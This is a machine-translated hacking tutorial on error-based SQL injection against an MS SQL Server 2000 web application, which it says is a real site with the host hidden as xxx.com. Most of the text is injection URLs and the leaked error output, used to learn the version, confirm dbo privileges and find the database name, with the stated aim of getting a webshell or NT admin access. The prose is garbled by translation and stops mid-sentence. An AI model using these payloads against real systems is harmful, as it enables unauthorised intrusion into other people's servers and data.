Squeeze dry MSSQL Server last drop of blood

The network of the change of the cloud, the network security let people cannot but pay attention to it. Database, so we have to think of the powerful Oracle,ms SQL. Microsoft has the most vulnerabilities, using SQL injection today to make MS SQL work well for us.

The following (using a well-known site as a test point), I believe that everyone on the SQL explosion database, explosion table, explosion fields have mastered, here is not much to say this.

Introduction to MS SQL built-in functions:

@ @VERSION Get the version number of Windows, MS SQL version number, patch. USER_NAME () Gets the current system connection user db_name () to get the current connected database HOST_NAME () to get the name of the current host

This information helps us to have a simple understanding of the system

OK, let's start right now!

Statement:http：//www.xxx.com/list.asp?classid=1'

Return information:

Microsoft OLE DB Provider for SQL Server 错误 '80040e14' 字符串 ' Order By Id DESC' 之前有未闭合的引号。 /list.asp，行290

From here the closed quotation marks ("'"), we can determine the existence of the SQL injection. Found in the loophole of course went on, using the functions described above for us to work:

Statement:

http：//www.xxx.com/list.asp?classid=1 and 0<>(select @@version)

Return:

Microsoft OLE DB Provider for SQL Server 错误 '80040e07' 将 nvarchar 值 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14：22：05 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195： Service Pack 4) ' 转换为数据类型为 int 的列时发生语法错误。 /list.asp，行290

The relevant information comes out, MS Server ADVANCED server 2000+SP4, SQL 2000+sp3, 8.00.760 from behind the MS SQL Server can be seen as a SP3 patch. Look at the server information, then you should understand the permissions of the database:

Statement:http：//www.xxx.com/list.asp?classid=1 and user_name()=’dbo’

Back: Information returned normally

Determines whether the permission is dbo, and connection users from surface dbo permissions are often involved in members of the sysadmin server role. Indicates that the database server role member group defaults to adding one dbo user per database.

Return principle root 1=1,1=2 similar. This is just a privilege test, and we also blew it out to see:

Statement:http：//www.xxx.com/list.asp?classid=1 and 0<>(select user_name())

Return:Microsoft OLE DB Provider for SQL Server 错误 '80040e07' 将 nvarchar 值 'dbo' 转换为数据类型为 int 的列时发生语法错误。 /list.asp，行290

Indicates that the user permissions for the connection database are high and can be determined to be members of the server role group.

Statement: Http://www.xxx.com/list.asp?classid=1 and 0<> (select Db_name ())-back: Microsoft OLE db Provider for SQL Server error ' 80040e07 ' syntax error occurred converting nvarchar value ' Gameimgsys ' to a column with a data type of int. /list.asp, Line 290

This can burst the current database. Access to such a high degree of access to the database connection members, of course, we would like to get Webshell directly, or directly to the NT ADMIN. NT admin depends on the current server configuration, if the configuration of unreasonable server, we want to directly take NT Admin, take NT admin will use: